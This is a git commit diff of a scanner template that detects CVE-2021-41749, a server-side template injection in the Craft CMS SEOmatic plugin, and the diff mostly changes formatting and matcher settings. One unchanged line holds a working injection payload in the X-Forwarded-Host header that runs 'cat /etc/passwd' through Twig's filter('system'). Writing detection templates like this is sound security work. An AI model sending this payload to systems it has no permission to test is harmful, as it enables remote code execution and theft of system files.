Update CVE-2021-41749.yaml

patch-1
Ritik Chaddha 2023-10-12 16:34:02 +05:30 committed by GitHub
parent 438ecc5186
commit fe6f534b69
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 5 deletions

View File

@ -2,11 +2,10 @@ id: CVE-2021-41749
info:
name: CraftCMS SEOmatic - Server-Side Template Injection
author: iamnoooob, ritikchaddha
author: iamnoooob,ritikchaddha
severity: critical
description: |
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side.Template Injection,
allowing for remote code execution.
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
reference:
- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
- https://nvd.nist.gov/vuln/detail/CVE-2021-41749
@ -41,6 +40,7 @@ http:
X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
Cache-Control: max-age=0
skip-variables-check: true
stop-at-first-match: true
redirects: true
max-redirects: 2
@ -48,12 +48,10 @@ http:
matchers:
- type: word
part: body
name: multiplication
words:
- '/{{marker}}{{result}}'
- type: regex
part: body
name: lfi
regex:
- "root:.*:0:0:"